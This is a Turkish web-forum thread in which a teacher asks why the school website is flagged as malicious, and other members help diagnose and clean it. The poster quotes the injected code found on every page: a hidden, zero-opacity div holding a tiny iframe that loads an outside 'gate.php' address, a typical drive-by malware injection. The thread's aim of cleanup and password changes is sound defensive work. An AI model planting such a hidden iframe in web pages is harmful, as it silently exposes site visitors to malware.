okul sitesinde virüs

Kodla Büyü

selcuklu

Seçkin Üye
Seçkin Üye
Okul sitemiz zararlı içerik var uyarısıyla açılmıyor. Dosyaları indirdim Avira ile virüs buldu del dedim ancak sonraki tarama da aynı şey yine var. Gönderdiğim resimdeki virüsler kodlarla mı ilgli bunu halledebileceğim bi antivirüs yada yazılım var mı.

Ekli dosyalar

• virüs.png
    virüs.png
    41.9 KB · Görüntüleme: 886
hocam index sayfasının kodlarına bi bak en altta karışık 3-5 satır bi yazı vardır onu sil, eğer hala virüs varsa başka sayfalarada bulaşmış olabilir o zaman sitenin yedeği varsa onu yükle yada siteyi indir tarat virüslü olanları tespit et temizle.. Ben öyle yapmıştım işe yaradı

Hocam bahsettiğin yer

<!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div class=pofasdfhg><iframe src=http://analitics3.in/gate.php?f=1007495 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0></iframe></div><!--/qpi-->
satırı olabilirmi.

büyük ihtimalle budur hocam en alttaki kod satırı olacak

aynı şey 2-3 yıl önce bende de olmuştu :)

temizleyip tekrar yüklüyorum tekrar geliyordu

google sakıncalı site uyarısı veriyordu

sonra fark ettimki şifre çalınmış otomatik olarak ekleniyor

meb'i arayıp şifreyi değiştirdim

temizleyip tekrar yükledim bir daha olmadı :)

Teşekkürler arkadaşlar tüm sayfalarda body html'in üstünde bu ifade yazılmış, galiba bundan kaynaklı. Şifreyi de değiştireyim. Sonucu burda paylaşırım.
Nerden kaptık bu virüsü anlamadım hiç.

Şifre çalınma olayı falan yok.Ya c r .acklı bir ftp programı kullanıyorsunuzdur yada virüslü bir siteye birgisayarınızdan girmişsiniz ve sizin bilgisayarda bağlanınca da artık sunucuda.Çözüm için tek tek dosyaları indirip tarayıp zararlı kodları silin.Ftp şifresini değiştirip File Zilla ile upload yapın hepsi bu.

ogretmenokan' Alıntı:
Şifre çalınma olayı falan yok.Ya c r .acklı bir ftp programı kullanıyorsunuzdur yada virüslü bir siteye birgisayarınızdan girmişsiniz ve sizin bilgisayarda bağlanınca da artık sunucuda.Çözüm için tek tek dosyaları indirip tarayıp zararlı kodları silin.Ftp şifresini değiştirip File Zilla ile upload yapın hepsi bu.

ftp programı değil windows gezgini kullanmayı tercih ederim
ayrıca okuldaki bilgisayardan değil evdeki bilgisayandanda denedim
gıcık olup format bile atmıştım
benim yaşadığımı ben bilirim
bay çok bilen :verymad:

Geri